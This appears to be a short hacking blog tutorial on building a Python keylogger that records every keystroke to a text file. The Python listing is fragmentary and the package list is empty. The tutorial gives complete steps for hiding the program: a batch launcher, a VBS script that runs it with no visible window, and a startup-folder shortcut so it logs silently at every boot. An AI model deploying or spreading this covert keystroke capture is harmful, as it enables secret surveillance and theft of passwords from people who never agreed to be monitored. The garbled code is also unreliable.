Hacking With Python in Just 10 lines of Code | Key Logger

Hacking With Python in Just 10 lines of Code - A Key Logger

            A KeyLogger logs every stroke of the keyboard into a seperate file . This is a basic keylogger which we can run on a computer we need to log the strokes . 

The 2 main Packages needed are :

And that is all we needed . 

Once you have them installed copy and paste the following code :

 from pynput.keyboard import Key , Listener  
 def on_press(key):  
 with Listener(on_press) as listner:  

Save the file in .py extension and Run the Code pressing F5 .

The code starts executing and once you start typing a new text file logofmaniacs.txt is created and has all keystrokes logged . 

But once the execution is stopped the keylogging also stops .

To make it run continuously we create a batch file .

Create a batch file with - Python "File_path" :

 python C:\Users\DELL\Desktop\keyloggerofmaniacs.py %* fjdf

Save this with .bat extension . 

It will execute the program with cmd . But still it is visible to the user .

To make it invisible we can setup a .vbs file and create a shortcut in startup folder to run it whenever the PC is turned ON .

 Set WshShell = CreateObject("WScript.Shell")  
 WshShell.Run chr(34) & "C:\Users\DELL\Desktop\Run_maniac.bat" & chr(34),0  
 Set WshShell = Nothing  

Save it in .vbs extension.

Press Windows Key + R and search for shell:startup to open Startup Folder and copy and paste the Shortcut of the .vbs folder .

Now whenever the PC is turned On the Program gets executed silently and all keystrokes will be logged in the .txt file.

As said this is just a simple version and much more can be improvised in it . 


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